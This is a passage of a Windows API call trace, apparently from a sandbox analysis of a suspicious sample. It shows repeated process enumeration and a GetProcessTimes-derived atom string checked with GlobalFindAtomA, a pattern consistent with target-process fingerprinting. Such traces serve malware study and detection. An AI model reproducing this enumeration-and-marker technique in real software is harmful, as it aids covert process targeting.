	[0104.533] CloseHandle (hObject=0x694) returned 1
	[0104.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.533] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.533] CloseHandle (hObject=0x694) returned 1
	[0104.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.533] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.533] CloseHandle (hObject=0x694) returned 1
	[0104.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.534] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.534] CloseHandle (hObject=0x694) returned 1
	[0104.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.534] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.534] CloseHandle (hObject=0x694) returned 1
	[0104.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.534] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.534] CloseHandle (hObject=0x694) returned 1
	[0104.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.534] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.534] CloseHandle (hObject=0x694) returned 1
	[0104.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.534] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.534] CloseHandle (hObject=0x694) returned 1
	[0104.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.535] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.535] CloseHandle (hObject=0x694) returned 1
	[0104.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.535] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.535] CloseHandle (hObject=0x694) returned 1
	[0104.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.535] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.535] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.536] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.536] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.536] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.537] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.537] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.537] CloseHandle (hObject=0x694) returned 1
	[0104.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.537] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.537] CloseHandle (hObject=0x694) returned 1
	[0104.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.537] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.537] CloseHandle (hObject=0x694) returned 1
	[0104.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.537] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.537] CloseHandle (hObject=0x694) returned 1
	[0104.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.573] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.573] CloseHandle (hObject=0x694) returned 1
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.574] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.574] CloseHandle (hObject=0x694) returned 1
	[0104.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.574] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.574] CloseHandle (hObject=0x694) returned 1
	[0104.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.574] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.574] CloseHandle (hObject=0x694) returned 1
	[0104.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.574] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.574] CloseHandle (hObject=0x694) returned 1
	[0104.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.575] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.575] CloseHandle (hObject=0x694) returned 1
	[0104.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.575] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.575] CloseHandle (hObject=0x694) returned 1
	[0104.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.575] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.575] CloseHandle (hObject=0x694) returned 1
	[0104.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.575] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.575] CloseHandle (hObject=0x694) returned 1
	[0104.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.575] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.575] CloseHandle (hObject=0x694) returned 1
	[0104.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.576] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.576] CloseHandle (hObject=0x694) returned 1
	[0104.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.576] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.576] CloseHandle (hObject=0x694) returned 1
	[0104.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.576] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.576] CloseHandle (hObject=0x694) returned 1
	[0104.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.576] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.576] CloseHandle (hObject=0x694) returned 1
	[0104.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.577] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.577] CloseHandle (hObject=0x694) returned 1
	[0104.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.577] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.577] CloseHandle (hObject=0x694) returned 1
	[0104.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.577] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.577] CloseHandle (hObject=0x694) returned 1
	[0104.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.577] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.577] CloseHandle (hObject=0x694) returned 1
	[0104.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.577] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.577] CloseHandle (hObject=0x694) returned 1
	[0104.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.578] CloseHandle (hObject=0x694) returned 1
	[0104.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.578] CloseHandle (hObject=0x694) returned 1
	[0104.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.578] CloseHandle (hObject=0x694) returned 1
	[0104.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.578] CloseHandle (hObject=0x694) returned 1
	[0104.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.578] CloseHandle (hObject=0x694) returned 1
	[0104.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.579] CloseHandle (hObject=0x694) returned 1
	[0104.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.579] CloseHandle (hObject=0x694) returned 1
	[0104.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.579] CloseHandle (hObject=0x694) returned 1
	[0104.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.579] CloseHandle (hObject=0x694) returned 1
	[0104.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.579] CloseHandle (hObject=0x694) returned 1
	[0104.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.580] CloseHandle (hObject=0x694) returned 1
	[0104.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.580] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.580] CloseHandle (hObject=0x694) returned 1
	[0104.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.580] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.580] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.580] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.581] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.581] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.581] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.581] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.581] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.581] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.581] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.582] CloseHandle (hObject=0x694) returned 1
	[0104.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.582] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.582] CloseHandle (hObject=0x694) returned 1
	[0104.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.582] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.582] CloseHandle (hObject=0x694) returned 1
	[0104.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.583] CloseHandle (hObject=0x694) returned 1
	[0104.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.633] CloseHandle (hObject=0x694) returned 1
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.633] CloseHandle (hObject=0x694) returned 1
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.633] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.633] CloseHandle (hObject=0x694) returned 1
	[0104.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.634] CloseHandle (hObject=0x694) returned 1
	[0104.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.634] CloseHandle (hObject=0x694) returned 1
	[0104.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.634] CloseHandle (hObject=0x694) returned 1
	[0104.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.635] CloseHandle (hObject=0x694) returned 1
	[0104.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.635] CloseHandle (hObject=0x694) returned 1
	[0104.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.635] CloseHandle (hObject=0x694) returned 1
	[0104.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.635] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.636] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.636] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.636] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.636] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.636] CloseHandle (hObject=0x694) returned 1
	[0104.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.637] CloseHandle (hObject=0x694) returned 1
	[0104.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.637] CloseHandle (hObject=0x694) returned 1
	[0104.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.637] CloseHandle (hObject=0x694) returned 1
	[0104.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.637] CloseHandle (hObject=0x694) returned 1
	[0104.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.637] CloseHandle (hObject=0x694) returned 1
	[0104.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.638] CloseHandle (hObject=0x694) returned 1
	[0104.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.639] CloseHandle (hObject=0x694) returned 1
	[0104.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.639] CloseHandle (hObject=0x694) returned 1
	[0104.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.639] CloseHandle (hObject=0x694) returned 1
